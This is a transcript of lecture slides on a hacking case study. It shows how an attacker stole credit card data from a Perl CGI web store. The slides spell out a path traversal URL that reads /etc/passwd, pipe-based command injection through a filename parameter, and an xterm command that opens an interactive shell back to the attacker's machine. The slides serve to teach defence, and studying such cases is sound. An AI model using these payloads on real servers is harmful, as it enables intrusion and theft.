1 / 19

Hacking Case Study

Hacking Case Study. Sungchul Hong. Acme Art, Inc. Case. October 31, 2001 www.acme-art.com A hacker stole credit card numbers from the online store’s database. Firewall was installed Only port 80 and 443 were open Computer forensics teams found following;. Server Environment.

verda
Download Presentation

Hacking Case Study

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Hacking Case Study Sungchul Hong

  2. Acme Art, Inc. Case • October 31, 2001 • www.acme-art.com • A hacker stole credit card numbers from the online store’s database. • Firewall was installed • Only port 80 and 443 were open • Computer forensics teams found following;

  3. Server Environment • Apache 1.312 on Linux system • Perl CGI script was used

  4. Hacker is looking around web pages and clicking images

  5. http://www.acme-art.com/idex.cgi?page=tahoe1.shtml

  6. Hacker's Move • HTTP://www.acme-art.com/index.cgi?page=index.cgi • 10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] “GET /cgi-bin/ HTTP/1.0” 403 272 • Hacker sees that index.cgi accepts a filename as a parameter and displays the contents of that filename. • He uses index.cgi itself as a parameter to display its own source code

  7. Vulnerability Revealed Index.cgi page is revealed *** No parameter type checking ***

  8. Vulnerability The hacker guesses the system file name and its path. Then open it.

  9. Error Message Reveals the programming secrete.

  10. Hacker’s Next Move http://www.acme-art.com/index.cgi?page=/../../../../../../../../../etc/passwd (write the passwd file into the screen)

  11. Message • The entire contents of the /etc/passwd file are returned and displayed in the browser. • Rootx0:0:root/root/bin/bash bin:x:1:1:bin/bin: daemonx:2:2:daemon:/sbin:admx3:4:adm:/var/adm: lp:x4:7:lp:/var/spool/lpd: syncx:5:0:sync:/sbin/bin/sync/shutdown:x:6:0shutdown:/sbin:shutdown halt:x:7:halt:/sbin/ …

  12. Next Move The hacker uses the pipe character in the file parameter, followed by commands of his choice. Now instead of a file being opened, Perl opens a file handle, which receives the standard output generated by the commands specified in the file name parameter

  13. Code • ls –la / *reveals files in the root directory • id /* get the process id for index.cgi • which xterm /*path for xterminal • (use hex ‘0A’ for line feed) • Now hackers can run any commands on the Web server under the security privileges of the “nobody” account.

  14. Use xterm to gain interactive shell access to the Web server. Xterm –display 10.0.1.21:210.0& (The xterm command launches an xterm window back to the attacker’s display on 10.0.1.21:0.0)

  15. Hacker’s View • Bash$ id • Uid=99(nobody) gid=99(nobody) group=99(nobody) • Bash$ pwd • /usr/local/apache/htdocs • Bash$

  16. Note • The attacker used port 80 (http port) • Use only HTTP • Firewall couldn’t help it. • Lesson: • All the inputs must be checked. • Do not show unnecessary information.

More Related